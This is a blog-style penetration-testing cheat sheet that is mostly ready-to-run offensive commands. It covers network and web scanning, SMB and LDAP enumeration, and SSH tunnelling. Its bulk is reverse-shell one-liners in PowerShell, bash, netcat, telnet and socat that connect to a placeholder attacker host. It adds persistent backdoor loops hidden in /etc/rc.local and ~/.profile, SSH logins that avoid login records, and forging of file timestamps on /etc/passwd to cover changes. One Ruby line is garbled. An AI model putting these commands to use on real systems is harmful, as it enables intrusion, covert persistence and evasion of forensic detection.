Information Technology | Softwares - Graphics - Programming - Hacking - Security

Nov 17, 2019

Useful collection of cheat sheet, tips for Penetration Testing

Network Scanning

$ nmap -A
Enables OS detection, version detection, script scanning, and traceroute
-sV           = enumerate versions
-sC           = default script scan
-vv           = verbosity
-o            = output directory
-T5           = aggresive scan
--script vuln = vulnerable script scan
-p1-65534   = all ports
$ nmap -sV -sT -Pn -sC -O -p-
nmap -sTV -p 1-65535 -oN fullscan_tcp

Web Content Discovery
$ wfuzz -z -w file,/usr/share/wordlists/seclists/Discovery/Web-Content/common.txt --ss flag 91
$ wfuzz -c -w /usr/share/seclists/Discovery/Web-Content/big.txt -z list,php-txt-html-zip-tar-tar.gz-7z --hc 403,404 -t 20 -u
$ gobuster dir -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt  -u
$ gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://jeff.thm/backups/ -t 20 -x zip,tar,gzip,php,txt,log
$ nikto -h
$ dirb


#Almost invisible SSH
$ ssh -o UserKnownHostsFile=/dev/null -T "bash -i"
This will not add your user to the /var/log/utmp file and you won't show up in w or who command of logged in users. It will bypass .profile and .bash_profile as well. On your client side it will stop logging the host name to ~/.ssh/known_hosts.

#SSH tunnel OUT

We use this all the time to circumvent local firewalls and IP filtering:
$ ssh -g -L31337:
You or anyone else can now connect to your computer on port 31337 and get tunneled to port 80 and appear with the source IP of ''.

#SSH tunnel IN
We use this to give access to a friend to an internal machine that is not on the public Internet:
$ ssh -o ExitOnForwardFailure=yes -g -R31338:
Anyone connecting to will get tunneled to on port 80 via your computer.

#SSH socks4/5 OUT

OpenSSH 7.6 adds support for reverse dynamic forwarding. Example: Tunnel all your browser traffic through your server.
$ ssh -D 1080
Now configure your browser to use SOCKS with All your traffic is now tunneled through and will appear with the source IP of

#SSH socks4/5 IN

This is the reverse of the above example. It give others access to your local network or let others use your computer as a tunnel end-point.
$ ssh -g -R 1080
The others configuring as their SOCKS4/5 proxy. They can now connect to any computer on any port that your computer has access to. This includes access to computers behind your firewall that are on your local network.

To list all shares
-N is null share
$ smbclient -N -L \\\\\\ 
$ smbcacls -N "//" /Users
smbmap gives really good info about shares
$ smbmap -u username -p pass1234 -d ECORP -H 
$ smbmap -u invaliduser
Read more:


$ ldapsearch -x -h -s base namingcontexts  
$ ldapsearch -x -h -s sub -b 'DC=DOMAIN,DC=NAME'

DNS Zone Transfer

$ dig axfr @TheDNSServerYouWanToAsk domain

Spawning TTY Shell

$ script -qc /bin/bash /dev/null  # Linux
$ script -q /dev/null /bin/bash   # BSD
$ python -c 'import pty; pty.spawn("/bin/sh")'
python3 -c 'import pty; pty.spawn("/bin/sh")'
ctrl+z background it
$ /bin/bash -i
$ stty raw -echo
$ nc -nvlp 4444

Create host to transfer file:

$ python -m SimpleHTTPServer <port eg:1337>
In py3: $ python -m http.server 1337
Download: $ wget <host>:<port>/<file>

Reverse Shells

$ powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('ATTACKER_IP',ATTACKER_PORT);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"


r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/ATTACKER_IP/ATTACKER_PORT;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])


$ ruby -rsocket -e'"ATTACKER_IP",ATTACKER_PORT).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'




$ bash -i >& /dev/tcp/ATTACKER_IP/ATTACKER_PORT 0>&1
On the remote system, this command will connect back to your system (IP = ATTACKER_IP, Port ATTACKER_PORT) and give you a shell prompt:
$ setsid bash -i &>/dev/tcp/ATTACKER_IP/ATTACKER_PORT 0>&1 &

#Reverse shell without Bash

Especially embedded systems do not always have Bash and the /dev/tcp/ trick will not work. There are many other ways (Python, PHP, Perl, ..). Our favorite is to upload netcat and use netcat or telnet:
On the remote system:
$ nc -e /bin/bash -vn ATTACKER_IP ATTACKER_PORT
Variant if '-e' is not supported:
$ mkfifo /tmp/.io
$ sh -i 2>&1 </tmp/.io | nc -vn ATTACKER_IP ATTACKER_PORT >/tmp/.io
Telnet variant:
$ mkfifo /tmp/.io
$ sh -i 2>&1 </tmp/.io | telnet ATTACKER_IP ATTACKER_PORT >/tmp/.io
Telnet variant when mkfifo is not supported (Ulg!):
$ (touch /dev/shm/.fio; sleep 60; rm -f /dev/shm/.fio) &
$ tail -f /dev/shm/.fio | sh -i 2>&1 | telnet ATTACKER_IP ATTACKER_PORT >/dev/shm/.fio


on attacker's host (listener)
$ socat file:`tty`,raw,echo=0 tcp-listen:ATTACKER_PORT
on target host (reverse shell)
$ socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:ATTACKER_IP:ATTACKER_PORT

Read more:

#Background reverse shell
A reverse shell that keeps trying to connect back to us every 3600 seconds (indefinitely). Often used until a real backdoor can be deployed and guarantees easy re-entry to a system in case our connection gets disconnected.
$ while :; do setsid bash -i &>/dev/tcp/ATTACKER_IP/ATTACKER_PORT 0>&1; sleep 3600; done &>/dev/null &
or add to /etc/rc.local:
$ nohup bash -c 'while :; do setsid bash -i &>/dev/tcp/ATTACKER_IP/ATTACKER_PORT 0>&1; sleep 3600; done' &>/dev/null &
or the user's ~/.profile (also stops multiple instances from being started):
fuser /dev/shm/.busy &>/dev/null
if [ $? -eq 1 ]; then
        nohup /bin/bash -c 'while :; do touch /dev/shm/.busy; exec 3</dev/shm/.busy; setsid bash -i &>/dev/tcp/ATTACKER_IP/ATTACKER_PORT 0>&1 ; sleep 3600; done' &>/dev/null &

How to survive high latency connections

Hacking over long latency links or slow links can be frustrating. Every keystroke is transmitted one by one and any typo becomes so much more frustrating and time consuming to undo. rlwrap comes to the rescue. It buffers all single keystrokes until Enter is hit and then transmits the entire line at once. This makes it so much easier to type at high speed, correct typos, ...
Example for the receiving end of a revese tunnel:
$ rlwrap nc -vnlp ATTACKER_PORT
Example for SSH:
$ rlwrap ssh user@host


#Restore the date of a file
Let's say you have modified /etc/passwd but the file date now shows that /etc/passwd has been modifed. Use touch to change the file data to the date of another file (in this example, /etc/shadow)
$ touch -r /etc/shadow /etc/passwd

#Encrypting a file

Encrypt your 0-Days and log files before transfering them - please. (and pick your own password):
$ openssl enc -aes-256-cbc -pbkdf2 -k gwCMefVOewAJgfsFVa <input.txt >input.txt.enc
$ openssl enc -d -aes-256-cbc -pbkdf2 -k gwCMefVOewAJgfsFVa <input.txt.enc >input.text
gwCMefVOewAJgfsFVa is example Key


About Us